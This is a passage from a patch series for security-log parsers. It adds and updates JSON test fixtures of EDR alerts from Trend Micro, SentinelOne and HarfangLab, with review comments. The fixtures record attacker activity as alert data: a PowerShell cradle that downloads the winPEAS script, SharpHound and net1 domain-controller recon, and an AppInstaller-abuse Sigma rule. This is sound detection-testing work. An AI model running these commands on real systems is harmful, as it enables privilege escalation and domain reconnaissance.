Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file From b0a30f3d53175743ba460104746263e2d78444db Mon Sep 17 00:00:00 2001 
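Review bot: The fixture's input carries two `amsi_rawDataStr` indicators (ids 1 and 2), yet the expected output maps only the first into `action.properties.ScriptBlockText`, so the second one (the full script body) is dropped without the test saying whether that is intended. If the parser keeps the first match by position, that rule belongs in a short comment next to the corresponding `set` stage in parser.yml, e.g. `# only the first amsi_rawDataStr indicator is surfaced as ScriptBlockText`, so the next fixture with several AMSI indicators is not read as a regression. `process.parent` receives `pid` and `command_line` from `parentPid`/`parentCmd` but no `executable`, which matches the input having no parent-path indicator. The file also ends without a trailing newline (`\ No newline at end of file`); adding one keeps later diffs on this fixture clean.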
From: vg-svitla
Date: Thu, 28 Nov 2024 15:28:49 +0200
Subject: [PATCH 296/317] Fix review comments
---
SentinelOne/identity/ingest/parser.yml | 10 +++++-----
SentinelOne/identity/tests/test_alert_1.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_11.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_12.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_13.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_14.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_15.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_16.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_5.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_6.json | 14 ++++++--------
SentinelOne/identity/tests/test_alert_7.json | 14 ++++++--------
11 files changed, 65 insertions(+), 85 deletions(-)
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
index 79cd3ec9f..90577404d 100644
--- a/SentinelOne/identity/ingest/parser.yml
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -51,11 +51,11 @@ stages:
 process.command_line: "{{json_event.message.process.cmdLine}}"
 process.parent.name: "{{json_event.message.process.parentName}}"
- file.path: "{{json_event.message.process.file.path}}"
- file.name: "{{json_event.message.process.file.path | basename}}"
- file.hash.sha1: "{{json_event.message.process.file.sha1}}"
- file.hash.sha256: "{{json_event.message.process.file.sha256}}"
- file.hash.md5: "{{json_event.message.process.file.md5}}"
+ process.executable: "{{json_event.message.process.file.path}}"
+ process.name: "{{json_event.message.process.file.path | basename}}"
+ process.hash.sha1: "{{json_event.message.process.file.sha1}}"
+ process.hash.sha256: "{{json_event.message.process.file.sha256}}"
+ process.hash.md5: "{{json_event.message.process.file.md5}}"
 sentinelone.identity.id: "{{json_event.message.id}}"
 sentinelone.identity.name: "{{json_event.message.name}}"
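Review bot: Renaming `file.path`/`file.name`/`file.hash.*` to `process.executable`/`process.name`/`process.hash.*` changes the field names this intake emits, so any saved search, detection rule or dashboard keyed on `file.hash.sha256` or `file.name` for Singularity Identity events will silently stop matching after this lands. The diffstat shows the ten fixtures updated but no CHANGELOG entry; a one-line entry such as `- Map process file attributes to process.executable / process.name / process.hash.* instead of file.*` would let operators catch the break. The enclosing `set` stage starts before this hunk, so I could not confirm from here whether `related.hash` is still fed from these renamed values; the updated fixtures still carry a `related.hash` array, so presumably it is.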
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json
index 1e8b5bf2b..8d5dcf96a 100644
--- a/SentinelOne/identity/tests/test_alert_1.json
+++ b/SentinelOne/identity/tests/test_alert_1.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T05:35:09Z",
- "file": {
- "hash": {
- "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
- },
- "name": "net1.exe",
- "path": "c:\\windows\\system32\\net1.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain"
+ "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain",
+ "executable": "c:\\windows\\system32\\net1.exe",
+ "hash": {
+ "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+ },
+ "name": "net1.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json
index a4d81025f..84d64cee6 100644
--- a/SentinelOne/identity/tests/test_alert_11.json
+++ b/SentinelOne/identity/tests/test_alert_11.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:51Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json
index 1618da843..3e75c9e78 100644
--- a/SentinelOne/identity/tests/test_alert_12.json
+++ b/SentinelOne/identity/tests/test_alert_12.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:51Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json
index a31ef954f..d94a9c18b 100644
--- a/SentinelOne/identity/tests/test_alert_13.json
+++ b/SentinelOne/identity/tests/test_alert_13.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:50Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json
index 7b9fc10e1..f8a4295bb 100644
--- a/SentinelOne/identity/tests/test_alert_14.json
+++ b/SentinelOne/identity/tests/test_alert_14.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:50Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json
index d8a7c1f8a..3d07d62a5 100644
--- a/SentinelOne/identity/tests/test_alert_15.json
+++ b/SentinelOne/identity/tests/test_alert_15.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:50Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
index 8a5217a55..0a9dc292d 100644
--- a/SentinelOne/identity/tests/test_alert_16.json
+++ b/SentinelOne/identity/tests/test_alert_16.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T08:45:50Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json
index f1339df60..6e14dbe24 100644
--- a/SentinelOne/identity/tests/test_alert_5.json
+++ b/SentinelOne/identity/tests/test_alert_5.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T09:54:58Z",
- "file": {
- "hash": {
- "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
- },
- "name": "cmd.exe",
- "path": "c:\\windows\\system32\\cmd.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "\"C:\\Windows\\system32\\cmd.exe\""
+ "command_line": "\"C:\\Windows\\system32\\cmd.exe\"",
+ "executable": "c:\\windows\\system32\\cmd.exe",
+ "hash": {
+ "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+ },
+ "name": "cmd.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json
index e43c64e20..5b987ddc2 100644
--- a/SentinelOne/identity/tests/test_alert_6.json
+++ b/SentinelOne/identity/tests/test_alert_6.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T09:45:51Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json
index d4acce26a..6fc5195cb 100644
--- a/SentinelOne/identity/tests/test_alert_7.json
+++ b/SentinelOne/identity/tests/test_alert_7.json
@@ -14,19 +14,17 @@
 "type": "info"
 },
 "@timestamp": "2024-11-22T09:45:51Z",
- "file": {
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe",
- "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
- },
 "observer": {
 "product": "Singularity Identity",
 "vendor": "SentinelOne"
 },
 "process": {
- "command_line": "Sharphound.exe"
+ "command_line": "Sharphound.exe",
+ "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+ "hash": {
+ "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+ },
+ "name": "sharphound.exe"
 },
 "related": {
 "hash": [
From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 28 Nov 2024 16:56:30 +0100
Subject: [PATCH 297/317] fix/Harfanglab
---
HarfangLab/harfanglab/ingest/parser.yml | 225 ++++++++++++++++++++++-
HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++
HarfangLab/harfanglab/tests/alert_5.json | 88 +++++++++
3 files changed, 424 insertions(+), 1 deletion(-)
create mode 100644 HarfangLab/harfanglab/tests/alert_4.json
create mode 100644 HarfangLab/harfanglab/tests/alert_5.json
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 1376e0758..93671efde 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation 
process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 
-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + 
"harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI 
scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..0f68a7c8c --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json 
